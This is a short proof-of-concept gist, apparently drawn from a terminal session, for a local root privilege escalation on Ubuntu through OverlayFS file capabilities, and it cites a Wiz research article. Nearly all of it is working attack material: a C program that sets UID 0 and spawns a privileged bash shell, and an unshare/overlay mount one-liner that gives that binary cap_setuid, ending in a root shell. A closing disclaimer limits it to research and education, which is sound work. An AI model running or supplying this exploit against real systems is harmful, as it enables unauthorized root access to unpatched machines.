user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
fprintf(stderr, "\x1b[31mFailed to set UID to 0.\x1b[0m\n");
return 1;
}
printf("Entering \x1b[36mprivileged\x1b[0m shell...\n");
if (system("/bin/bash -p") == -1) {
fprintf(stderr, "\x1b[31mFailed to execute /bin/bash -p.\x1b[0m\n");
return 1;
}
return 0;
}user@hostname:~/exploit$ gcc test.c -o test
user@hostname:~/exploit$ ls -l
total 20
-rwxr-xr-x 1 kali kali 16320 Nov 10 08:43 test
-rw-r--r-- 1 kali kali 412 Nov 10 08:42 test.c
user@hostname:~/exploit$ ./test
Failed to set UID to 0.
user@hostname:~/exploit$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer)
user@hostname:~/exploit$ unshare -rm sh -c "
mkdir l u w m &&
cp test l/ &&
setcap cap_setuid+eip l/test &&
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &&
touch m/test &&
u/test;"
Entering privileged shell...
root@hostname:~/exploit# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@hostname:~/exploit#
Refer to the original research article for more details: https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability (archive)
This PoC is intended for research and educational purposes only. Any actions taken based on the information provided in this gist are solely at the user's own risk. The vulnerabilities described in this report should not be exploited in any unauthorized or malicious manner. The authors and contributors are not responsible for any misuse or damage that may result from the use of this information.